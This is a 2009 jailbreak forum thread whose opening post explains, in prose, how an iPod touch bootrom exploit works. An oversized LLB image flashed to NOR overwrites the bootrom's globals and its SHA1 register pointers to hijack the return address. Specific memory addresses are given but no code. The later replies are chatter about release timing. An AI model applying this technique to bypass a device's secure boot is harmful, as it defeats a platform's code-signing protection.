A more in-depth explanation of the new exploit

Discussion in 'iPod touch 2G Jailbreak: redsn0w, 24kpwn, etc.' started by shortperson1026, Mar 10, 2009.

  1. shortperson1026

    shortperson1026 Active Member

    Joined:
    Apr 11, 2008
    Messages:
    3,455
    Likes Received:
    21
    Note

    It is unclear how, but the company "NitroKey" is selling this. We were planning on holding back for the new iPhone (which subsequently could mean an iPod 3G as well), but now that they are profiteering off of this we would like to explain exactly how this works as soon as possible so people do not have to pay for it. I apologize if the wording is odd, as I wrote it up a little while ago, planning to post it this summer.

    Credit

    chronic, CPICH, ius, planetbeing, pod2g, posixninja, and co.

    Exploit

    The address that the bootrom loads LLB into is 0x22000000, and for some reason, it stores it's global variables dangerously close, at 0x22024000. Now, when loading LLB from NOR, it does not have any sort of maximum size limit, unlike if it was receiving a file via USB. You just can gracefully overwrite, and for some parts, will need to reconstruct, the beginning of the data (_bss) section. There are a few different ways you could exploit this to actually run unsigned code at this level, but so far the easiest one found is based on another fail decision that Apple made. For some reason, they and put the SHA1 hardware address array smack dab in our way, so at this point, you can change anything there that you want. By changing the pointer to SHA1 Data Input Register 1 into a pointer to where the current LR is on the stack, it will put whatever is at 0x20 of the image in LR, which is all that is important. By putting your payload somewhere in the padding (you need padding, since LLB is less than 0x24000 bytes obviously), you can just put the address of it at 0x20 of the image! If you actually don't want to run unsigned code but instead just want to run the LLB, then you will first need to have it put the original bytes back at 0x20 in the file before you do anything else, as well as put the original SHA1 hardware address back in the array. Another important thing to remember is that you must 1. add 0x22000000 to whatever the offset of your payload is in the file, since that is where it loads LLB in memory, and 2. reverse it for endianess.

    Prerequisites


    Because files sent over USB have a size limitation, one thing that is the ability to flash the NOR unsigned.

    Via the iphone wiki page HERE.
  2. Nathan B

    Nathan B Active Member

    Joined:
    Dec 12, 2008
    Messages:
    3,061
    Likes Received:
    0
    Device:
    iPhone 5 (Black)
    Nice

    Please Register or Log in to view images

    so, what have the iPhone dev team said they are going to do? have they given an ETA for the untethered release?
  3. shortperson1026

    shortperson1026 Active Member

    Joined:
    Apr 11, 2008
    Messages:
    3,455
    Likes Received:
    21
  4. neetan

    neetan Member

    Joined:
    Dec 30, 2008
    Messages:
    82
    Likes Received:
    0
    Device:
    iPhone 4S (White)
    This makes alot more sense

    Please Register or Log in to view images

    but can you post it?
  5. shortperson1026

    shortperson1026 Active Member

    Joined:
    Apr 11, 2008
    Messages:
    3,455
    Likes Received:
    21
    Yes. I just did.
  6. Nathan B

    Nathan B Active Member

    Joined:
    Dec 12, 2008
    Messages:
    3,061
    Likes Received:
    0
    Device:
    iPhone 5 (Black)
    I think he means can you post how to do it
  7. shortperson1026

    shortperson1026 Active Member

    Joined:
    Apr 11, 2008
    Messages:
    3,455
    Likes Received:
    21
    No I don't know how.
  8. AmazingNachos

    AmazingNachos Banned

    Joined:
    Feb 23, 2009
    Messages:
    481
    Likes Received:
    0
    Device:
    2G iPod touch
    i read MuscleNerd would update quickpwn for it
  9. neetan

    neetan Member

    Joined:
    Dec 30, 2008
    Messages:
    82
    Likes Received:
    0
    Device:
    iPhone 4S (White)
    no i never meant anything like that. LOL
    i meant would u get banned
  10. Nathan B

    Nathan B Active Member

    Joined:
    Dec 12, 2008
    Messages:
    3,061
    Likes Received:
    0
    Device:
    iPhone 5 (Black)
    Woot

    Please Register or Log in to view images

Share This Page